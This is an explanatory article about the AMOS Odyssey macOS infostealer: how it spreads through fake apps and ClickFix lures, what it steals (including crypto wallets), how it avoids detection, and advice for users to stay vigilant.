AMOS Odyssey is the latest rebranded version of a notorious macOS infostealer known as Atomic macOS Stealer (AMOS). Unlike mercenary spyware targeting governments or journalists, Odyssey is a cybercriminal tool designed to steal money and personal data from everyday users. Its evolution signals an increasing threat to Apple’s ecosystem, especially for those active in cryptocurrency.
What is AMOS Odyssey malware?
Originally launched as AMOS, the malware was sold on Russian-speaking forums as a powerful information stealer targeting macOS devices. Its new name, Odyssey, reflects an upgraded version packed with new features. Odyssey specializes in exfiltrating financial data, browser credentials, and files, making it especially dangerous for crypto users.
How does AMOS Odyssey infect macOS users?
Odyssey spreads through deceptive tricks rather than brute force. The most common methods include fake cracked apps, malicious ads, and phishing sites offering fake software updates. One notorious technique, called ClickFix, lures users into entering malicious commands into their Terminal under the guise of a verification process.
What kind of data does Odyssey steal?
Once installed, Odyssey digs deep. It can steal browser passwords, autofill data, and cookies from Chrome, Safari, Firefox, Brave, and Edge. It also targets Apple Keychain credentials, Telegram chats, and cryptocurrency wallets such as Exodus, Electrum, and Coinomi. For added damage, it can grab files from Documents and Desktop folders.
How does Odyssey avoid detection?
Odyssey employs advanced evasion techniques. It uses obfuscation, rotates its hash signatures, and applies XOR encoding to bypass antivirus tools. If it detects it’s running in a sandbox or virtual machine, it shuts itself down to avoid analysis. Recent updates even added a backdoor feature that allows attackers to swap legitimate apps with malicious clones.
Why is Odyssey especially dangerous for crypto users?
Crypto holders are prime targets because Odyssey directly looks for hot wallets stored on macOS. By stealing wallet keys or application data, attackers can siphon digital assets with little chance of recovery. The rise of Odyssey on platforms like Reddit highlights how the malware is being actively pushed to unsuspecting crypto enthusiasts.
Conclusion
So, what is AMOS Odyssey? It’s a rebranded, highly dangerous macOS infostealer that has evolved to target crypto users and personal data with alarming precision. Its growth shows why Mac owners—especially in crypto—must stay vigilant, update their systems, and avoid suspicious downloads.
